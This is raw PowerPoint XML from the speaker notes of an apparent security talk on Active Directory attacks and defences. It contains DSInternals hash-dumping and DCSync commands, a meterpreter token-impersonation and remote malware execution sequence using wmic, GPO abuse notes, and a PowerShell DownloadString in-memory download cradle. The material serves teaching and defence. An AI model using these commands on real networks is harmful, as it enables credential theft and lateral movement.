                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DSInternals</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Running the following will extract the hashes in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> format (necessary for the next step) –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$key = Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>BootKey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SystemHivePath</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&lt;PATH TO SYSTEM HIVE HERE&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>' Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ADDBAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -All -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DBPath</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&lt;PATH TO NTDIS.DIT HERE&gt;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BootKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> $key | Format-Custom -View </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HashcatNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> | Out-File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>&lt;OUTPUT PATH HERE&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -Encoding ASCII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that we have a neat little hash extraction, we can get to comparing our users’ passwords against the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Pwned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Passwords dataset. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.troyhunt.com/pwned-passwords-now-as-ntlm-hashes/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/thegeekkid/CompromiseCheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>NTLM hashes aren't salted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> (do read the two answers there if you're wondering why), providing them in downloadable form means they can easily be used to compare to hashes within an AD environment just as they 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script to compare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Builds a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hashmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> of AD NTLM hashes/usernames and iterates through a second list of hashes checking for the existence of each entry in the AD NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hashmap</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https://github.com/DGG-IT/Match-ADHashes/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hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DSInternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t> PowerShell Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, that can retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>reversibly encrypted plaintext passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, password hashes and Kerberos keys of all user accounts from remote domain controllers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dump all accounts at once, but this can cause heavy (=suspicious) replication traffic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ADReplAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> -All -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NamingContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 'DC=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Adatum,DC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=com' -Server LON-DC1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://adsecurity.org/?p=1729</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/</a:t>
            </a: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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42002818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http://woshub.com/defending-windows-domain-against-mimikatz-attacks/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Guard, has appeared that allows to isolate and protect LSASS from unauthorized access.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Ok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> lets move on to file-less malware detection and then demo</a:t>
            </a:r>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62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423256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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; use incognito, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impersonate_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> CAMPUS\\Administrator, Then add more accounts, Mount file C:\Windows\system32&gt;net use Z: \\192.168.140.137\C, Then Copy file copy "y:\Software\MALSoftware\MALClient\Installers\windows\installer\setup.exe" z:\Windows\system32\ Then run process shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wmic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>node:host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process call create “c:\windows\temp\malware.exe”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Derivative Local Admin http://www.sixdub.net/?p=591</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Abusing GPO Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://wald0.com/?p=179</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abuse: Add new local admin account.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abuse: Deploy a new evil scheduled task (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>: PowerShell download cradle).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abuse: Create and configure new evil services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Policy Location: Computer Configuration\Preferences\Windows Settings\Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Abuse: Configure and deploy evil startup scripts. Can run scripts out of GPO directory, can also run PowerShell commands with arguments</a:t>
            </a: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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8734989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look at Empire </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(New-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>System.net.Webclient</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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>()</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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and how Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>InjectThread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> finds it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>video </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FEDE1C12-C9CF-46A0-842F-2DF97B971405}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>63</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2526619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Password Reuse (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HaveIBeenPWND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passwords that are easy to guess</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https://screencast-o-matic.com/u/vqZ/CrackHashResponder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  Go to 3:36 minutes into video</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a:t>https://screencast-o-matic.com/u/vqZ/LLMNR_HTTPCapture  Responder running and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SMBRelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> running with payload and Listener for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>SMBRelayPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> (1:03 Minutes in).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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https://g-laurent.blogspot.com/2017/03/multirelay-20-runas-pivot-svc-and.html?m=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire  &lt;and see all the modules in Empire and the Agents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploiting Windows network with Responder and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MultiRelay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: 10:36 into it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.youtube.com/watch?v=rjRDsXp_MNk&amp;t=627s</a:t>
            </a:r>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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42247569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https://www.sans.org/summit-archives/file/summit-archive-1536351477.pdf</a:t>
            </a:r>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65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
